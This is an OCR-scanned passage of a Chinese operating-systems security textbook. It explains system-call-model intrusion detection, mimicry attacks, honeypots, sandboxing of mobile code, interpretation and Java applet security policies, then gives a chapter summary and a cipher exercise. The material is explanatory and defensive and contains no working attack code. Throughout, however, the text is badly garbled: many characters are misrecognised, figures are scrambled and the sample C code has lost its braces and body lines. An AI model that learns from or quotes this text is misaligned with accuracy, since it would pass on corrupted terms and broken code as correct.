下 ， 调 试 者 可 以 指示 内 核 把 被 调试 者 封装 起 来 ， 然 后 把 被 调试 者 的 所 
有 系统 调用 都 传递 给 自己 来 监视 。 


9.8.5 “基于 模型 的 入 侵 检 测 


还 有 一 种 方法 可 以 保护 我 们 的 机 器 ， 那 就 是 安装 一 个 IDS 
(Intrusion Detection System) 。IDS 有 两 种 基本 的 类 型 ， 一 种 关注 于 监 
测 进入 电脑 的 网 络 包 ， 另 一 种 关注 寻找 CPU 上 的 异常 情况 。 之 前 在 防 
火 墙 的 部 分 我 们 简要 地 提 到 了 网 络 IDS;， 现 在 我 们 对 于 基于 主机 的 IDS 
进行 一 些 讲解 。 出 于 篇 幅 限制 ， 我 们 不 能 够 审视 全 部 的 种 类 繁多 的 基 
于 主机 的 IDS。 相 反 地 ， 我 们 选择 一 种 类 型 来 简单 地 了 解 它们 是 如 何 工 
作 的 。 这 种 类 型 是 基于 静态 模型 的 入 侵 检测 (wagner 和 Dean， 

2001) 。 它 可 以 用 上 面 提 到 的 内 禁 技术 来 实现 ， 同 时 也 有 其 他 的 实现 
TE ° 


在 图 9-36a 中 我 们 看 到 了 这 样 一 个 小 程序 ， 它 打开 一 个 叫 data 的 文 
件 ， 然 后 每 次 一 个 字符 地 读 入 ， 直 到 遇 到 了 一 个 0 字 节 ， 这 时 打印 出 文 
件 开始 部 分 的 非 0 字 节 的 个 数 然后 程序 退出 。 在 图 9-36b 中 ， 我 们 看 到 了 
这 个 程序 的 系统 调用 图 (这 里 打印 被 叫做 write) 。 


int main(int argc *char argv[]) 


int fd, n = 0; 
char buf[1]; 


fd = open("data", 0); 
if (fd < 0) { 
printf("Bad data file\n"); 
exit(1); 
} else { 
while (1) { 
read(fd, buf, 1); 
if (buf[0] == 0) { 
close(fd); 
printf("n = %d\n", n); 
exit(0); 
} 


n=n+1; 


图 9-36 a) 程 序 ; b) 该 程序 的 系统 调用 图 


这 个 图 告诉 了 我 们 什么 呢 ? 首先 ， 在 任何 情况 下 ， 这 个 程序 的 第 
一 个 系统 调用 一 定 是 open。 第 二 个 系统 调用 十 read 或 者 write， 这 要 根据 
执行 训 语 句 的 那个 分 文 来 决定 。 如 果 第 二 个 系统 调用 是 write， 那 么 吏 意 
味 着 文件 无 法 打开 ， 然 后 下 一 个 系统 调用 必须 是 exit。 如 果 第 二 个 系统 
调用 是 read， 那 么 可 能 还 有 额外 任意 多 次 的 read 调 用 ， 并 且 最 后 调用 
close、write 和 exit。 在 没有 入 侵 的 情况 下 ， 其 他 序列 是 不 可 能 的 。 如 宁 
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验证 某 个 序列 是 不 是 有 效 的 。 


现在 假设 某 人 发 现 了 这 个 程序 的 一 个 bug， 然 后 成 功 地 引起 了 缓冲 
区 海 出 ， 播 入 并 执行 了 恶意 代码 。 当 恶意 代码 运行 的 时 候 ， 极 大 的 可 
能 是 会 执行 一 个 不 同 的 系统 调用 序列 。 例 如 ， 亚 意 代码 可 能 演 试 打开 
某 个 它 想 要 复制 的 文件 或 者 可 能 和 家 里 的 电话 建立 网 络 连接 。 当 第 一 
次 出 现 系 统 调用 不 符合 原来 的 模式 时 ， 狱 鞭 十 分 肯定 地 认定 出 现 了 攻 
击 并 会 采取 行动 ， 比 如 结束 这 个 进程 并 同系 统管 理 员 报警 。 这 样 ， 入 
侵 检 测 系 统 束 能 够 在 攻击 发 生 的 时 候 检 查 到 它们 。 静 仿 系统 调用 分 析 
只 是 很 多 IDS 工 作 方 法 中 的 一 种 。 


当 使 用 这 种 基于 静 仿 模型 的 入 侵 检测 的 时 候 ， 狱 于 必须 知道 这 个 
模型 (比如 系统 调用 图 ) 。 最 直接 的 方式 就 是 让 编译 器 产生 它 并 让 程 
序 的 作者 签名 同时 附 上 它 的 证 书 。 这 样 的 话 ， 任 何 预先 修改 可 执行 程 
序 的 企图 都 会 被 在 程序 运行 的 时 候 检 测 到 ， 因 为 实际 的 行为 和 被 签 过 
名 的 预期 行为 不 一 致 。 


很 不 地 的 是 ， 一 个 聪明 的 攻击 者 可 能 发 动 一 种 叫做 模仿 攻击 
(mimicry attack) 的 攻击 ， 在 这 种 攻击 中 插入 的 代码 会 有 和 该 程序 同 
样 的 系统 调用 序列 (Wagner 和 Soto，2002) ， 所 以 我 们 需要 更 复杂 的 
模型 ， 不 能 仅仅 依靠 跟踪 系统 调用 。 然 而 ， 作 为 深层 防御 的 一 部 分 ， 
IDS 还 是 扮演 着 重要 的 角色 。 


无 论 如 何 ， 基 于 模型 的 IDS 不 仅仅 是 以 一 种 。 许 多 IDS 利 用 了 一 个 
FL ite (honeypot) 的 概念 ， 这 是 一 个 吸引 和 捕捉 攻击 者 和 恶意 软件 
的 陷阱 。 通 常 蜜 铅 会 是 一 个 孤立 的 机 器 ， 几 乎 没有 防御 ， 表 面 看 起 来 
令 人 感 兴 趣 并 且 有 些 有 价值 的 内 容 ， 像 一 个 成 熟 等 竺 采摘 的 果实 一 
样 。 设 置 蜜 钢 的 人 会 小 心经 中 地 监视 它 上 面 的 任何 攻击 并 尽量 去 了 解 
攻击 的 特征 。 一 些 IDS 会 把 蜜 钢 放 在 虚拟 机 上 防止 对 下 层 实 际 系 统 的 破 
坏 。 所 以 很 自然 地 ， 恶 意 软 件 也 会 像 之 前 提 到 的 努力 地 检查 自己 是 否 
运行 在 一 个 虚拟 机 上 。 


9.8.6 ”封装 移动 代码 


病毒 和 蠕虫 不 需要 制造 者 有 多 大 学 问 ， 而 且 往往 会 与 用 户 意愿 相 
肥 地 侵入 到 计算 机 中 。 但 有 时 人 们 也 会 不 经 意 地 在 目 己 的 机 右上 放 入 
并 执行 外 来 代码 。 和 情况 通常 是 这 样 发 生 的 ， 在 遥远 的 过 去 (在 Internet 
HAH, (REE) ， 大 多 数 网 页 是 台 有 人 少量 相关 网 片 的 静态 文件 ， 
而 现在 越 来 越 多 的 网 页 包含 了 叫做 Applet 的 小 程序 。 当 人 们 下 载 包含 
Applet 的 网 页 时 ，Applet 束 会 被 调用 并 运行 。 例 如 ， 某 个 Applet 也 许 包 
含 了 需要 填充 的 表格 以 及 交互 式 的 帮助 信息 。 当 表格 填 好 后 会 被 送 到 
网 上 的 某 处 进行 处 理 。 税 单 、 客 户 产 品 定单 以 及 许多 种 类 的 表格 都 可 
以 使 用 这 种 方法 。 


男 一 个 让 程序 从 一 台 计 算 机 到 男 一 台 计 算 机 上 运行 的 例子 古代 理 
程序 (agent) 。 代 理 程序 指 用 户 让 程序 在 目标 计算 机 上 执行 任务 后 再 
返回 报告 。 例 如 ， 要 求 某 个 代理 程序 查看 旅游 网 站 ， 查 找 从 阿 姆 斯 特 
丹 到 旧金山 的 最 便宜 航线 。 代 理 程 序 会 登录 到 每 个 站 点 上 运行 ， 找 到 
所 需 的 信息 后 ， 再 前 进 到 下 一 个 站 点 。 当 所 有 的 站 点 查询 完毕 后 ， 它 
返回 原 处 并 报告 结果。 


第 三 个 移动 代码 的 例子 是 PostScript 文 件 中 的 移动 代码 ， 这 个 文件 
将 在 PostScript 打 印 机 上 打印 出 来 。 一 个 PostScript 文 件 实际 上 是 用 


PostScript 语 言 编 写 ， 它 可 在 打印 机 里 执行 的 程序 。 它 通常 告诉 打印 机 
如 何 画 某 些 特定 的 曲线 并 加 以 填充 ， 它 也 可 以 做 其 他 任何 想 做 的 事 。 
Applet、 代 理 和 PostScript 是 移动 代码 (mobile code) 的 三 个 例子 ， 当 
然 还 有 许多 其 他 的 例子 。 


在 前 面 大 篇 幅 讨 论 了 病毒 和 蠕虫 之 后 ， 我 们 很 清楚 地 意识 到 让 外 
来 代码 运行 在 目 己 的 计算 机 上 多 少 有 点 冒险 。 然 而 ， 有 些 人 的 确 想 要 
运行 外 来 代码 ， 所 以 就 会 产生 问题 “移动 代码 可 以 安全 运行 吗 ?” 简 
Maz: 可 以 ， 但 并 不 容易 。 最 基本 的 问题 在 于 当 进 程 把 Applet 或 其 
他 的 移动 代码 插入 地 址 空间 并 运行 后 ， 这 些 代码 束 成 了 合法 的 用 户 进 
程 的 一 部 分 ， 并 且 掌 握 了 用 户 所 拥有 的 权限 ， 包 括 对 用 户 的 磁 盘 文件 
进行 读 、 写 、 删 除 或 加 密 ， 把 数据 用 E-mail 发 送 到 其 他 国家 等 。 


很 久 以 前 ， 损 作 系 统 推 出 了 进程 的 概念 ， 为 的 是 在 用 户 之 间 建 立 
阳 离 墙 。 在 这 一 概念 中 ， 每 个 进程 都 有 目 己 的 保护 地 址 空间 和 UID， 
允许 获取 目 己 的 文件 和 资源 ， 而 不 能 获取 他 人 的 。 而 对 于 保护 进程 的 
一 部 分 ( 指 Applet) 或 者 其 他 资源 来 说 ， 进 程 概念 也 无 能 为 力 。 线 程 
允许 在 一 个 进程 中 控制 多 个 线程 ， 但 是 单个 线程 与 其 他 线程 之 间 却 没 
有 提供 保护 。 


从 理论 上 来 说 ， 将 每 个 Applet 作 为 独立 的 进程 运行 只 能 帮 上 一 点 
忙 ， 但 缺乏 可 操作 性 。 例 如 ， 某 个 Web 网 页 包含 了 相互 之 间 互 相 影 响 
的 两 个 或 多 个 Applet， 而 数据 在 Web 页 里 。Web 浏 览 器 也 需要 与 Applet 


交互 ， 局 动 或 停止 它们 ， 为 它们 输入 数据 等 。 如 果 每 个 Applet 被 放 在 
目 己 的 进程 里 ， 驳 无 法 进行 任何 操作 。 而 且 ， 把 每 个 Applet 放 在 目 己 
的 地 址 空间 里 并 不 能 保证 Applet 不 守 取 或 损害 数据 。 如 有 果 有 Applet 想 这 
样 做 是 很 容易 的 ， 因 为 没有 人 在 一 旁 监 视 。 


4 


人 们 还 使 用 了 许多 新 方法 来 对 付 Applet (通常 是 移动 代码 ) 。 下 
面 我 们 将 看 看 其 中 的 两 种 方法 : 沙 盒 法 和 解释 法 。 另 外 ， 代 码 俭 名 同 
样 能 够 用 于 验证 Applet 代 码 。 每 一 种 方法 都 有 目 己 的 长 处 和 短处 。 


第 一 种 方法 叫做 沙 盒 法 (sandboxing) ， 这 种 方法 将 每 个 运行 的 
Applet 限 制 在 一 定 范围 的 有 效 地 址 中 (Wahbe 等 人 ,1993) 。 它 的 工作 
原理 是 把 虚拟 地 址 空间 划分 为 相同 大 小 的 区 域 ， 每 个 区 域 叫做 沙 盒 。 
每 个 沙 盒 必 须 保 证 所 有 的 地 址 共 吾 高 位 字 节 。 对 32 位 的 地 址 来 说 ， 我 
们 可 以 把 它 划 分 为 256 个 沙 盒 ， 每 个 沙 例 有 16MB 空 间 并 共享 相同 的 高 
8 人 位。 同样， 我 们 也 可 以 划分 为 512 个 8MB 空 间 的 沙 盒 ， 每 个 沙 盒 共 享 
9 位 地 址 前 级 。 沙 盒 的 尺寸 可 以 选取 到 足够 容纳 最 大 的 Applet 而 不 当 费 
太 多 的 地 址 空间 。 如 果 页 面 调用 满足 的 话 ， 物 理 内 存 不 会 成 为 问题 。 
每 个 Applet 拥 有 两 个 沙 盒 ， 一 个 放置 代码 ， 另 一 个 放置 数据 ， 如 图 9- 
37a 所 示 的 16 个 16MB 的 沙 盒 。 


虚拟 地 址 


(单位 MB) 
2 
‘| DTE 
AA 
mend DEES by Ot A SHY MOV R1, S1 
Vj PLAS SHR #24, S1 
192 CMP S1, S2 
TRAPNE 
T MERD 
| 
和 
小 应 用 。 
程序 
4 EIT 
国人 
1T ieee 
小 应 用 
o CEE) 程序 
a) b) 


9-37 a) 内 存 被 划分 为 16 MB 的 沙 盒 ， b) 检 查 指 令 有 效 性 的 一 种 
方法 


沙 盒 的 用 意 在 于 保证 每 个 Applet 不 能 跳 转 到 或 引用 其 他 的 代码 沙 
盒 或 数据 沙 盒 。 提 供 两 个 沙 盒 的 目的 是 为 了 避免 Applet 在 运行 时 超越 
限制 修改 代码 。 通 过 抑制 把 所 有 的 Applet 放 入 代码 沙 鲍 ， 我 们 减少 了 
自我 修改 代码 的 危险 。 只 要 Applet 通 过 这 种 方法 受到 限制 ， 它 就 不 能 
损害 浏览 絮 或 其 他 的 Applet， 也 不 能 在 内 存 里 培植 病毒 或 者 对 内 存 造 
成 损失 。 


ABApplethKARA, COREA SNK, AeA oko 
但 代 码 和 数据 的 引用 是 否 已 被 限制 在 相应 的 沙 盒 里 。 在 下 面 的 讨论 
中 ， 我 们 将 看 一 下 代码 引用 (如 JMP 和 CALL 指 令 ) ， 数 据 引用 也 是 如 
此 。 使 用 直接 寻 址 的 静态 JMP 指 令 很 容易 检查 ， 目标 地 址 是 否 仍旧 在 
代码 沙 盒 里 ” 同样 ， 相 对 JMP 指 令 也 很 容易 检查 。 如 末 Applet 含 有 要 
试图 离开 代码 沙 盒 的 代码 ， 它 束 会 被 拒绝 并 不 予 执行 。 同 样 ， 试 图 搁 
触 外 界 数 据 的 Applet 也 会 被 拒绝 。 


最 困难 的 是 动态 JMP。 大 多 数 计算 机 都 有 这 样 一 条 指令 ， 该 指令 
中 要 跳 转 的 目标 地 址 在 运行 的 时 候 计 算 ， 该 地 址 被 存 入 一 寄存 种 ， 然 
后 间接 跳 转 。 例如， 通过 JMP (R1) 跳 转 到 寄存 器 1 里 存放 的 地 址 。 这 
种 指令 的 有 效 性 必须 在 运行 时 检查 。 检 查 时 ， 系 统 直接 在 间接 跳 转 之 
前 插入 代码 ， 以 便 测试 目标 地 址 。 这 样 测 试 的 一 个 例子 如 图 9-37b 所 
示 。 请 记 住 ， 所 有 的 有 效 地 址 都 有 同样 的 高 k 位 地 址 ， 所 以 该 地 址 前 缀 
被 存放 在 临时 寄存 器 里 ， 如 说 S2。 这 样 的 寄存 看 不 能 彼 Applet 目 喘 使 
用 ， 因 为 Applet 有 可 能 要 求 重 写 寄存 器 以 避免 受 该 寄存 右 限 制 。 


有 关 代 码 是 按 如 下 工作 的 : 盲 先 把 被 检查 的 目标 地 址 复制 到 临时 
寄存 右 S1 中 。 然 后 该 寄存 需 同 右 移 位 正好 将 S1 中 的 地 址 前 绥 隔 离 出 
来 。 第 二 步 将 隔离 出 的 前 绥 同 原先 闭 入 S2 寄 存 秀 里 的 正确 前 绥 进 行 比 
较 。 如 采 不 匹配 束 滞 活 陷 阱 程序 杀 死 进程 。 这 段 代码 序列 需要 四 条 指 
令 和 两 个 临时 寄存 器。 


对 运行 中 的 二 进 制 程序 打 补 丁 需要 一 些 工 作 ， 但 却 是 可 行 的 。 如 
果 Applet 是 以 源 代码 形式 出 现 ， 工 作 束 容易 得 多 。 随 后 在 本 地 的 编译 
妖 对 Applet 进 行 编 译 ， 目 动 查 看 静态 地 址 并 插入 代码 来 校 验 运行 中 的 
动态 地 址 。 同 样 也 需要 一 些 运 行 时 间 的 开销 以 便 进行 动态 校 验 。 
Wahbe A (1993) 估计 这 方面 的 时 间 大 约 占 4%， 这 一 般 是 可 接受 
的 。 


另 一 个 要 解决 的 问题 是 当 Applet 试 图 进行 系统 调用 时 会 发 生 什 
A? 解决 方法 是 很 直接 的 。 系 统 调 用 的 指令 被 一 个 叫做 基准 监视 需 的 
特殊 模块 所 大 代 ， 这 一 模块 采用 了 与 动态 地 址 校 验 相同 的 检查 方式 
(或 者 ， 如 果 有 源 代码 ， 可 以 链接 一 个 调用 基准 监视 器 的 库 文件 ， 而 
不 是 执行 系统 调用 ) 。 在 这 两 个 方法 中 ， 基 准 监 视 右 检查 每 一 个 调用 
企图 ， 并 决定 该 调用 是 否 可 以 安全 执行 。 如 果 认 为 该 调用 是 可 接受 
的 ， 如 在 指定 的 暂 存 目录 中 写 临时 文件 ， 这 种 调用 整 可 以 执行 。 如 果 
调用 被 认为 是 危险 的 或 者 基准 监视 需 无 法 判断 ，Applet 就 被 终止 。 乔 
基准 监视 器 可 以 判断 是 哪 一 个 Applet 执 行 的 调用 ， 内 存 里 的 一 个 基准 
监视 器 就 能 处 理 所 有 这 样 Applet 的 请 求 。 基 准 监 视 器 通常 从 配置 文件 
中 获知 是 否 允 许 执行 。 


2. 解 释 


第 二 种 运行 不 安全 Applet 的 方法 是 解释 运行 并 阻止 它们 获得 对 硬 
件 的 控制 。Web 济 名 絮 使 用 的 就 是 这 种 方法 。 网 页 上 的 Applet 通 常 是 用 


Java 写 的 ，Java 可 以 是 一 种 普通 的 编程 语言 ， 也 可 以 是 高 级 脚本 语 
言 ， 如 安全 TCL 语 言 或 Javascript。Java Applet 首 先 被 编译 成 一 种 叫做 
JVM (Java 虚 拟 机 ，Java Virtual Machine) 的 面向 栈 的 机 器 语言 。 正 是 
这 些 JVM Applet 被 放 在 网 页 上 ， 当 它们 被 下 载 时 就 插入 到 浏览 怖 内 置 
的 JVM 解 释 器 中 ， 如 图 9-38 所 示 。 


虚拟 地 址 空间 
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9-38 ”Applet 可 以 被 Web 浏 览 器 以 解释 方式 执行 


使 用 解释 运行 的 代码 比 编译 运行 的 代码 好 处 在 于 ， 每 一 条 指令 在 
执行 前 都 由 解释 器 进行 检查 。 这 就 给 了 解释 器 识别 校 验 地 址 是 否 有 效 
的 机 会 。 男 外 ， 系 统 调用 也 可 以 被 捕 提 并 解释 。 这 些 调用 的 处 理 方式 
与 安全 策略 有 关 。 例 如 ， 如 果 Applet 是 可 信任 的 (如 来 自 本 地 磁盘 的 
Applet) ， 它 的 系统 调用 就 可 以 毫 无 疑问 会 被 执行 。 但 是 如 果 Applet 不 


受信 任 (如 来 自 mtemet 的 Applet) ， 它 就 会 被 放 入 沙 盒 来 限制 自身 的 
行为 。 


高 级 脚本 语言 也 能 够 被 解释 执行 。 这 里 ， 解 释 执行 不 需要 机 硕 地 
址 ， 所 以 也 束 不 存在 脚本 以 不 允许 的 方式 访问 内 存 所 带 来 的 危险 。 解 
释 运 行 的 缺点 是 : 它 与 编译 运行 的 代码 相 比 十 分 缓慢 。 


9.8.7 ” Java 安全 性 


人 们 设计 了 Java 编 程 语言 和 相关 的 运行 时 系统 ， 是 为 了 一 次 编写 并 
编译 后 束 能 够 在 Interent 上 以 二 进 制 代码 的 形式 运行 在 所 有 文 持 Java 的 
机 器 上 。 从 一 开始 设计 Java 语 言 开 始 ， 安 全 性 就 成 为 其 重要 的 一 部 分 。 
在 这 一 小 三， 我 们 来 看 看 它 的 工作 原理 。 


Java 是 一 种 在 类 型 上 安全 的 编程 语言 ， 也 就 是 说 编译 器 会 拒绝 任何 
与 自身 类 型 不 一 致 的 变量 使 用 。 而 C 语 言 正好 相反 ， 请 看 下 面 的 代码 : 


naughty_func() 


代码 把 产生 的 随机 数 放 在 指针 p 中 。 然 后 把 0 字 市 存储 在 p 所 包含 的 
地 址 中 ， 和 鹤 盖 了 地 址 里 原先 的 任何 代码 和 数据 。 而 在 Java 中 ， 混 合 使 用 
类 型 的 语句 是 被 语法 所 茜 止 的 。 而 且 ，Java 没 有 指针 变量 、 类 型 转换 、 
用 户 控制 的 存储 单元 分 配 (如 malloc 和 free) ， 并 且 所 有 的 数组 引用 都 
要 在 运行 时 进行 校 验 。 


Java 程 序 被 编译 成 一 种 叫做 JVM (Java Virtual Machine) ASA 
中 间 形 态 二 进 制 代码 。JVM 有 大 约 100 个 指令 ， 大 多 数 指令 是 把 不 同类 


型 的 对 象 压 入 栈 、 弹 出 栈 或 是 用 算术 合并 栈 里 的 对 象 。 这 些 JVM 程 序 
通常 是 解释 执行 程序 ， 虽 然 在 某 些 情况 下 它们 可 以 被 编译 成 机 器 语言 
以 便 执 行 得 更 快 。 在 Java 模 式 中 ， 通 过 Internet 发 送 到 远程 计算 机 上 运 
行 的 Applet 是 JVM 程 序 。 


当 Applet 到 达 远 程 计 算 机 时 ， 首 先 由 JVM 字 蔬 码 校 验 硕 查看 Applet 
是 否 符合 规则 。 正 确 编译 的 Applet 会 目 动 符合 规则 ， 但 无 法 阻止 一 个 恶 
意 的 用 户 用 汇编 语言 写 JVM 格 式 的 Applet。 校 验 的 规则 包括 : 


1)Applet 是 否 伪造 了 指针 ? 

2) 是 否 违背 了 私有 类 成 员 的 访问 限制 ? 

3) 是 否 试图 把 某 种 类 型 的 变量 用 作 其 他 类 型 ? 
4) 是 否 产生 栈 上 淤 或 下 海 ? 


5) 是 否 非法 地 将 变量 从 一 种 类 型 较 换 为 另 一 种 类 型 ? 


如 果 Applet 通 过 了 所 有 的 测试 ， 它 就 能 被 安全 地 执行 并 且 不 用 担心 
它 会 访问 非 自 己 所 有 内 存 空间 。 


但 是 Applet 也 可 以 通过 调用 Java 方 法 (RE) 来 执行 系统 调用 。 
Java 处 理 这 种 调用 的 方法 也 在 不 断 在 进步 。 在 最 初 的 Java 版 本 JDK 
(Java Development Kit) 1.0 里 ，Applet 被 分 为 两 类 : 可 信和 的 与 不 可 信 


的 。 从 本 地 磁盘 取出 的 Applet 是 可 信 的 并 被 允许 执行 任何 所 需要 的 系统 
调用 。 相 反 ， 从 Internet 获 取 的 Applet 是 不 可 信 的 。 它 们 被 限制 在 沙 盒 里 
运行 ， 如 图 9-38 所 示 ， 实 际 上 并 不 能 做 什么 事 。 


在 从 这 一 模式 中 取得 了 些 经 验 后 ，Sun 公 司 认 为 对 Applet 的 限制 太 
大 了 。 在 JDK 1.1 版 本 里 ， 引 入 了 版 本 标注 。 当 Applet 从 Internet 传 递 过 
来 后 ， 系 统 首 移 查 看 Applet 是 否 有 用 户 信 任 的 个 人 或 组 织 标注 (通过 用 
户 所 信任 的 标注 者 列表 来 定义 ) 。 如 果 是 ，Applet 就 被 允许 做 任何 操 
作 ， 否 则 束 必 须 在 沙 盒 里 运行 并 且 受 到 很 强 的 限制 。 


在 获取 了 一 些 经 验 后 ， 代 码 标注 也 不 那么 令 人 满意 了 ， 所 以 安全 
模式 又 有 了 变化 。JDK 1.2 版 本 提供 了 一 套 可 配置 的 严密 的 安全 策略 ， 
针对 包含 本 地 和 异地 所 有 的 Applet。 安全 模式 非常 复杂 导致 需要 整整 一 
本 书 来 描述 (Gong,1999) ， 我 们 仅仅 归纳 出 一 些 精华 的 部 分 。 


每 一 个 Applet 具 有 两 个 特性 : 来 源 于 何 处 以 及 谁 签 辕 了 它 。 来 源 于 
何 处 是 指 URL;， 谁 签署 了 它 是 指 签名 所 用 的 私 钥 。 每 个 用 户 都 能 创建 
包含 规则 列表 的 安全 策略 。 规 则 列 出 了 URL、 签署 者 、 对 象 以 及 如 有 果 
Applet 的 URL 和 签署 者 匹配 规则 时 可 在 对 象 上 执行 的 动作 。 从 概念 上 来 
说 ， 上 述 信息 如 图 9-39 所 示 ， 虽 然 真 正 的 格式 有 所 不 同 并 且 与 Java 的 类 
FRAR ° 


[URL 签署 者 HK 动作 


| 

s —_ _ | 
www.taxprep.com TaxPrep | /usrsusan/1040.xls | Read | 
* | /usr/tmp/* Read, Write 


www.microsoft.com Microsoft | /usr/susan/Office/- Read, Write, Delete | 


Al 9-39 JDK1.2 所 指定 的 某 些 保护 规则 的 实例 


其 中 的 一 种 允许 的 动作 是 访问 文件 。 该 动作 可 以 指定 某 一 特定 的 
文件 或 日 录 ， 给 定 目 录 下 的 所 有 文件 ， 或 给 定 日 录 下 所 有 的 文件 和 子 
目录 的 递归 集合 。 图 9-21 的 三 行 包含 了 3 种 情况 。 在 第 一 行 里 ， 用 户 
Susan 建 立 了 她 的 许可 文件 ， 这 样 来 自 她 的 税务 预备 用 计算 机 ， 
www.taxprep.com， 并 由 该 公司 签名 的 Applet 可 以 访问 位 于 1040.xls 文 件 
里 的 她 的 税务 数据 。 这 是 惟一 可 读 的 文件 ， 并 且 任 何其 他 的 Applet 都 不 
能 读 。 而 且 ， 来 目 于 所 有 资源 的 所 有 Applet， 无 论 是 否 签名 ， 都 可 以 读 
写 /usr/tmp 中 的 文件 。 


而 且 ，Susan 也 信任 Microsoft， 让 来 自 于 该 公司 站 点 并 签名 过 的 
Applet 恋 、 写 或 删除 Office 目 录 下 的 所 有 文件 。 例 如 ， 修 复 bug 并 安装 新 
的 软件 版 本 。 为 了 校 验 签名 ，Susan 要 么 在 她 的 磁 副 里 存放 公 钥 ， 要 人 么 
动态 地 获取 公 钥 ， 例 如 ， 在 持 有 她 所 信任 的 公司 的 公 钥 以 后 ， 使 用 该 
公司 的 签名 证 书 格式 。 


文件 不 是 仅仅 要 保护 的 资源 。 网 络 访问 也 可 以 被 保护 。 被 保护 的 
对 象 是 特定 计算 机 的 特定 端口 。 每 一 台 计 算 机 由 一 个 耳 地 址 或 DNS 名 


确定 ;计算 机 上 的 端口 由 一 排 数字 确定 。 可 能 的 动作 包括 要 求 连 接 远 
程 计算 机 以 及 接受 来 目 远 程 计算 机 的 连 返 。 通 过 这 种 方法 ，Applet 可 以 
获得 访问 网 络 的 权限 ， 但 仅 局 限于 与 许可 列表 中 明示 的 计算 机 进行 交 
谈 。Applet 可 以 动态 地 装 入 所 需 的 附加 代码 (K) ,但 用 户 提 供 的 类 装 
载 器 可 以 精确 地 控制 由 哪 台 计算 机 产生 这 样 的 类 。 当 然 还 有 其 他 大 量 
的 安全 特性 。 


99 ”有关 安全 性 研究 


计算 机 安全 性 是 一 个 非常 热门 的 话题 ， 很 多 人 都 在 研究 。 其 中 一 
个 重要 的 话题 就 是 可 信 计 算 ， 尤 其 是 可 信 计 算 的 平台 (Erickson, 
2003; Garfinkel 等 人 ，2003; Reid 和 Caelli，2005 以 及 Thibadeau， 
2006) 和 相关 的 公共 政策 话题 (Anderson，2003) 。 信 息 流 的 模型 和 
现 是 一 个 正在 研究 的 话题 (Castro 等 人 ，2006; Efstathopoulos 等 


人 ，2005: Hicks 等 人 ，2007 和 Zeldovich 等 人 ，2006) œ 


用 户 验 证 (包括 生物 学 识别 ) 仍然 是 很 重要 的 (BhargavSpantzel 
等 人 ，2006; Bergadano 等 人 ，2002; Pusara 和 Brodley，2004; Sasse, 
2007 以 及 Yoon 等 人 ，2004) 。 


各 种 恶意 软件 被 广泛 地 研究 ， 包 括 特洛伊 木马 (Agrawal A, 
2007; Franz，2007 和 Moffie 等 人 ，2006) 、 病 毒 (Bruschi A, 
2007; Cheng 等 人 ，2007 和 Rieback 等 人 ，2006) 、 蠕 虫 (Abdelhafez 等 
人 ，2007; Jiang 和 Xu，2006; Kienzle 和 Elder，2003 以 及 Tang 和 
Cheng, 2007) 、 间 谍 软 件 (Egele“# A, 2007; Felten 和 Halderman ， 
2006 以 及 Wu 等 人 ，2006) 和 rootkit (Kruegel 等 人 ，2004; Levine 等 
人 ，2006; Quynh 和 Takefuji，2007 以 及 Wang 和 Dasgupta，2007) ° K£ 
然 病毒 、 间 诬 软 件 和 rootkit 都 会 尽力 地 隐藏 ， 那 么 束 会 有 天 于 stealth 技 
术 的 工作 以 及 它们 怎么 样 才能 被 侦 测 到 (Carpenter 等 人 ，2007; 


Garfinkel 等 人 ，2007 以 及 Lyda 和 Hamrock，2007) 。 加 密 技术 本 身 也 
要 被 检查 (Harmsen 和 Pearlman，2005 以 及 Kratzer 等 人 ，2006) ° 
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计算 机 中 经 常会 包 台 有 价值 的 机 密 数 据 ， 包 括 纳 税 申请 单 、 信 用 
卡 账 号 、 商 业 计划 、 区 易 秘密 等 。 这 些 计算 机 的 主人 通常 非常 渔 望 保 
证 这 些 数 据 是 私人 所 有 ， 不 会 被 审改 ， 这 束 迅 速 地 导致 了 我 们 要 求 操 
作 系 统一 定 要 有 好 的 安全 性 。 一 种 保证 信息 机 密 的 方法 十 把 它 加 密 并 
肥 善 地 保管 密 铀 。 有 时 候 提 供 数字 信 息 的 验证 是 很 重要 的 ， 在 这 种 情 
况 下 ， 可 以 使 用 加 密 散 列表 、 数 字 签 名 ， 以 及 被 一 个 可 信 的 证 书 验 证 
机 构 所 签名 的 证 书 。 


对 信息 的 访问 权限 可 以 模型 化 为 一 个 大 矩阵 ， 行 表示 域 (用 
F) ， 列 表示 对 象 (文件 ) 。 每 一 个 元 素 表 示 相 应 的 域 对 相应 对 象 的 
访问 权限 。 因 为 这 个 矩阵 是 稀疏 的 ， 所 以 它 可 以 按 行 存储 ， 这 样 束 成 
了 一 个 能 力 链表 ， 表 示 某 一 域 能 够 做 什么 ， 或 者 稀 玖 矩阵 也 可 以 按 列 
存储 ， 这 样 就 成 了 一 个 访问 控制 链表 ， 表 示 谁 并 且 如 何 访问 这 个 对 
象 。 使 用 正式 的 建 模 技 术 ， 系 统 里 的 信息 流 可 以 被 模型 化 并 受到 限 
制 。 但 是 ， 有 时 利用 隐秘 的 通道 还 是 可 以 泄露 出 去 的 ， 比 如 调整 CPU 
的 利用 率 。 


在 任何 一 个 安全 的 系统 一 定 要 认证 用 户 。 这 可 以 通过 用 户 知道 
的 、 用 户 拥 有 的 ,或 者 用 户 的 映 份 (生物 测定 ) 来 完成 。 使 用 双 因 素 
的 号 份 认证 ， 比 如 虹膜 扫描 和 口令 ， 可 以 加 强 安全 性 。 


代码 中 有 很 多 bug 可 以 被 利用 来 控制 程序 和 系统 。 这 些 包括 缓冲 区 
次 出 、 格 式 串 攻击 、 返 回 ]ibc 攻 击 、 整 数 洲 出 攻击 、 代 码 注 入 攻击 和 特 
MG ABE ° 
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和 rookit。 每 一 个 都 对 数据 机 密 性 和 一 致 性 产生 着 威胁 。 更 糟糕 的 是 ， 
恶意 软件 攻击 可 能 会 控制 一 台 机 器， 并 把 这 人 台 机 大 变 成 一 台 僵 记 机 天 
用 来 发 送 垃圾 邮件 或 者 发 起 其 他 的 攻击 。 


幸运 的 是 ， 系 统 有 很 多 种 方法 来 保护 自己。 最 好 的 策略 就 古 全 面 
防御 ， 使 用 多 种 技术 一 起 防御 。 这 些 技术 有 防火 墙 、 病 毒 扫 描 、 代 三 
签名 、 因 蔡 、 入 侵 检 测 ， 以 及 封闭 移动 代码 。 


习题 

1 破译 下 列 的 单一 字符 替换 密 文 。 明 文 包含 的 仅仅 是 字母 ， 并 且 
是 Lewis Carroll 的 著名 诗歌 。 

kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg ur bzha kfthcm 

